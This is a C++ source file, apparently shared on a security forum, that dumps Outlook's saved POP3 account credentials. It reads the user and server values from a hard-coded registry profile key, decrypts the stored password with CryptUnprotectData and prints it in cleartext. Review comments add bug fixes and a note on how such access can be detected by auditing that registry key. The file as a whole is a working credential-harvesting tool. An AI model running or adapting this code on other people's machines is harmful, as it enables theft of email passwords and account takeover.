// Retrieve the passwords saved by Outlook
// Source: http://www.mamicode.com/info-detail-516836.html
// How it works: http://securityxploded.com/outlookpasswordsecrets.php
// Builds with VS2012 (MBCS character set)
// Windows 7, Outlook 2010
#include "stdafx.h"
#include <windows.h>
#include <iostream>
#include <cstdlib>
#include <stdio.h>
using namespace std;
#include <iostream>
#include <cstdlib>
#include <stdio.h>
using namespace std;
#pragma comment(lib, "crypt32.lib")
/*
WINCRYPT32API
BOOL
WINAPI
CryptUnprotectData(
__in DATA_BLOB* pDataIn, // in encr blob
__deref_opt_out_opt LPWSTR* ppszDataDescr, // out
__in_opt DATA_BLOB* pOptionalEntropy,
__reserved PVOID pvReserved,
__in_opt CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
__in DWORD dwFlags,
__out DATA_BLOB* pDataOut
);
*/
// Prints the banner line and then a usage-style line that embeds the
// program name passed in `prog` (the caller hands over argv[0]).
// Output goes to stdout; nothing is returned.
void opt(char* prog)
{
    // Fixed banner text, written as-is.
    fputs("Welcome [url=http://www.90sec.org]www.90sec.org[/url]\r\n", stdout);

    // Program name is substituted into the second line.
    fprintf(stdout, "[-]:%s Get_pop3 passwords\r\n", prog);
}
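// Entry point: opens one hard-coded Outlook account subkey under
// HKEY_CURRENT_USER, prints its "POP3 User" and "POP3 Server" values, then
// passes the "POP3 Password" value (minus its first byte) to
// CryptUnprotectData and prints the result.
//
// Always returns 0, including on failure; failures are reported on stdout.
//
// Review notes:
//  - DPAPI ties the protected blob to the credentials of the user who stored
//    it, and no optional entropy is supplied here, so the decrypt step only
//    succeeds when run in that user's logon context.
//  - The recovered password is written to stdout in cleartext; anything that
//    captures this output (logs, redirected files) then holds the secret.
//  - From a monitoring point of view, the observable behaviour is a
//    non-Outlook process reading "POP3 Password" under the Profiles key and
//    then calling CryptUnprotectData; auditing read access to that key is
//    what surfaces it.
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc; // unused; kept for the standard entry-point signature

    opt(argv[0]);
    printf("\r\n");

    // "00000003" is the account's sequence number; set it to match your own setup.
    LPCWSTR lpRun = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003";

    HKEY hKey = NULL;
    long lRet = RegOpenKeyExW(HKEY_CURRENT_USER, lpRun, 0, KEY_READ, &hKey);
    if (lRet != ERROR_SUCCESS)
    {
        // lRet is a long, so the conversion is %ld (was %d).
        printf("RegOpenKeyEx Failed. Ret=%ld\r\n", lRet);
        return 0;
    }
    printf("RegOpenKeyEx Ing.....\r\n");

    DWORD dwtype = REG_BINARY; // receives the stored value type; not otherwise used

    // RegQueryValueExW does not guarantee a terminating NUL on the data it
    // returns. The buffers are zero-initialised and the size passed in leaves
    // the last wchar_t untouched, so the %S prints below cannot run past the
    // end of the buffer.
    wchar_t pop3User[100] = {0};
    DWORD pop3UserLen = sizeof(pop3User) - sizeof(wchar_t);
    if (RegQueryValueExW(hKey, L"POP3 User", 0, &dwtype,
                         reinterpret_cast<LPBYTE>(pop3User), &pop3UserLen) == ERROR_SUCCESS)
    {
        printf("POP3 User:%S\r\n", pop3User);
    }

    wchar_t pop3Server[100] = {0};
    DWORD pop3ServerLen = sizeof(pop3Server) - sizeof(wchar_t);
    if (RegQueryValueExW(hKey, L"POP3 Server", 0, &dwtype,
                         reinterpret_cast<LPBYTE>(pop3Server), &pop3ServerLen) == ERROR_SUCCESS)
    {
        // Label corrected: the value read is "POP3 Server" (it was printed as "Smtp Server").
        printf("POP3 Server:%S\r\n", pop3Server);
    }

    BYTE reBuff[1000] = {0};
    DWORD sizeBuff = sizeof(reBuff);
    if (RegQueryValueExW(hKey, L"POP3 Password", 0, &dwtype, reBuff, &sizeBuff) == ERROR_SUCCESS)
    {
        bool decrypted = false;

        // The stored value is passed to DPAPI without its first byte
        // (presumably a format marker; see the write-up referenced in the
        // file header). Guard the subtraction: with sizeBuff == 0 the DWORD
        // would wrap and CryptUnprotectData would be told to read far past
        // reBuff.
        if (sizeBuff > 1)
        {
            DATA_BLOB DataPassword;
            DATA_BLOB DataOutput = {0, NULL};
            DataPassword.cbData = sizeBuff - 1;
            DataPassword.pbData = &reBuff[1];

            if (CryptUnprotectData(&DataPassword, NULL, NULL, NULL, NULL,
                                   CRYPTPROTECT_UI_FORBIDDEN, &DataOutput))
            {
                decrypted = true;

                // Do not assume the plaintext is NUL-terminated: print at most
                // cbData bytes' worth of wide characters.
                const wchar_t* text = reinterpret_cast<const wchar_t*>(DataOutput.pbData);
                const size_t maxChars = DataOutput.cbData / sizeof(wchar_t);
                size_t len = 0;
                while (len < maxChars && text[len] != L'\0')
                {
                    ++len;
                }

                std::wcout << "POP3 Password: ";
                std::wcout.write(text, static_cast<std::streamsize>(len));

                // The output buffer is allocated by CryptUnprotectData and must
                // be released with LocalFree; wipe the cleartext first so it
                // does not linger on the heap.
                SecureZeroMemory(DataOutput.pbData, DataOutput.cbData);
                LocalFree(DataOutput.pbData);
            }
        }

        if (!decrypted)
        {
            std::cout << "Read error\r\n" << std::endl;
        }
    }

    // Single exit path: the key handle is now closed on every route through
    // the password branch (the early returns used to skip this call).
    RegCloseKey(hKey);
    return 0;
}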